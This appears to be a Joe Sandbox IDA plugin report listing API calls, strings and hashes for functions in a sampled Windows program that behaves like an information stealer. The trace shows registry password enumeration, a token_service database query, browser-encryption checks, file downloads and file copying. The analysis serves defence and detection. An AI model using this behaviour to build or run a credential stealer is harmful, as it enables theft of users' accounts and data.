                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                  APIs
                                                  • lstrcpy.KERNEL32(?,?), ref: 00B31642
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                    • Part of subcall function 00B394C7: StrStrA.SHLWAPI(?,?), ref: 00B394D3
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B3167E
                                                    • Part of subcall function 00B394C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B394F7
                                                    • Part of subcall function 00B394C7: lstrlen.KERNEL32(?), ref: 00B3950E
                                                    • Part of subcall function 00B394C7: wsprintfA.USER32 ref: 00B3952E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B316C6
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B3170E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B31755
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B3179D
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B317E5
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B3182C
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B31874
                                                    • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                    • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                  • strtok_s.MSVCRT ref: 00B319B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                  • String ID:
                                                  • API String ID: 4276352425-0
                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction ID: de17bcf454e56c29d618321a6b91162f9b464dfa252976e1e288600326079dfd
                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction Fuzzy Hash: 5971A3B2940118ABCB14FBB4DC89EEE73B9AF65300F2049D8F14DA2151EE759B84CF61
                                                  APIs
                                                  • memset.MSVCRT ref: 00407314
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                  • task.LIBCPMTD ref: 00407555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                  • String ID: Password
                                                  • API String ID: 2698061284-3434357891
                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,0086A8A8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                  • lstrcatA.KERNEL32(?,00836548), ref: 00414847
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                  • lstrcatA.KERNEL32(?,0086B058), ref: 0041486F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID: 0aA
                                                  • API String ID: 167551676-2786531170
                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0086A548,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0086A548,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                  • __aulldiv.LIBCMT ref: 00418172
                                                  • __aulldiv.LIBCMT ref: 00418180
                                                  • wsprintfA.USER32 ref: 004181AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                  • String ID: %d MB$@
                                                  • API String ID: 2886426298-3474575989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                  APIs
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                    • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                    • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00B26376
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B263AE
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B263F6
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B2641A
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B26443
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B26471
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00B264B0
                                                  • InternetCloseHandle.WININET(?), ref: 00B264BA
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B264C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 4287319946-0
                                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction ID: 17c10dc79e0c2974e9733b0d6e187607687e7ef9068650737aafaaa5f5b33aca
                                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction Fuzzy Hash: 765152B5940218AFDB20EF90DC45BEE77B9EB44701F1080D8F649A72C0DB746A85CF95
                                                  APIs
                                                  • memset.MSVCRT ref: 00B34FEE
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B35017
                                                  • lstrcat.KERNEL32(?,00421000), ref: 00B35034
                                                    • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                    • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                  • memset.MSVCRT ref: 00B3507A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B350A3
                                                  • lstrcat.KERNEL32(?,00421020), ref: 00B350C0
                                                    • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                    • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                    • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                    • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                  • memset.MSVCRT ref: 00B35106
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3512F
                                                  • lstrcat.KERNEL32(?,00421038), ref: 00B3514C
                                                    • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C17
                                                    • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B34C2C
                                                    • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C49
                                                    • Part of subcall function 00B34B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B34C85
                                                    • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,0064A524), ref: 00B34CB1
                                                    • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B34CC3
                                                    • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CD7
                                                    • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B34CE9
                                                    • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CFD
                                                    • Part of subcall function 00B34B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B34D13
                                                    • Part of subcall function 00B34B77: DeleteFileA.KERNEL32(?), ref: 00B34D98
                                                  • memset.MSVCRT ref: 00B35192
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID:
                                                  • API String ID: 4017274736-0
                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction ID: 0d468eea5b52cb56e3775011ab45deef1c93e9183d8ce058407912b590eb2e9f
                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction Fuzzy Hash: 5C41D579A4021467C714F7B0EC47FD97778AF25701F5044D4B689660D1EEB897C88B92
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00B38397
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B3839E
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B383BF
                                                  • __aulldiv.LIBCMT ref: 00B383D9
                                                  • __aulldiv.LIBCMT ref: 00B383E7
                                                  • wsprintfA.USER32 ref: 00B38413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 2774356765-2766056989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: a41ea1299fbf37b94a7d6dc89ea32a35f9b86d435cfaf73fdfcf0350893b4112
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: FC214AB1E44318ABDB00DFD4DC49FAEBBB9FB44B04F204649F605BB680C77869008BA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                  • API String ID: 1440504306-1079375795
                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess$DefaultLangUser
                                                  • String ID: B
                                                  • API String ID: 1494266314-2248957098
                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                  APIs
                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                  • memset.MSVCRT ref: 00409EE8
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                  • API String ID: 1977917189-1096346117
                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                  • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                  APIs
                                                    • Part of subcall function 00B27537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
                                                    • Part of subcall function 00B27537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                    • Part of subcall function 00B27537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                    • Part of subcall function 00B27537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                    • Part of subcall function 00B27537: HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 00B2786D
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278AF
                                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 00B278C1
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278F6
                                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 00B27907
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B2793A
                                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 00B27954
                                                  • task.LIBCPMTD ref: 00B27962
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                  • String ID:
                                                  • API String ID: 2677904052-0
                                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction ID: bedc729543feb421c78f6188188ff6421edba6a30d58b1973172d7455a244abf
                                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction Fuzzy Hash: 41315E79A40119EFDB04FBE0EC95DFE77BAEB55301F205058F10A672A0DE34A942CB65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 3894370878-0
                                                  • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                  • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B25231
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B25238
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B25251
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B25278
                                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B252A8
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 00B252F1
                                                  • InternetCloseHandle.WININET(?), ref: 00B25320
                                                  • InternetCloseHandle.WININET(?), ref: 00B2532D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 1008454911-0
                                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction ID: 7407285280472b4cc9e15fee30f3df434af0ed6486e51c9d9ba6125508fbde8d
                                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction Fuzzy Hash: 1431F8B8A40228EBDB20CF94DC85BDCB7B5EB48704F5081D9F609A7281D7746EC58F99
                                                  APIs
                                                    • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
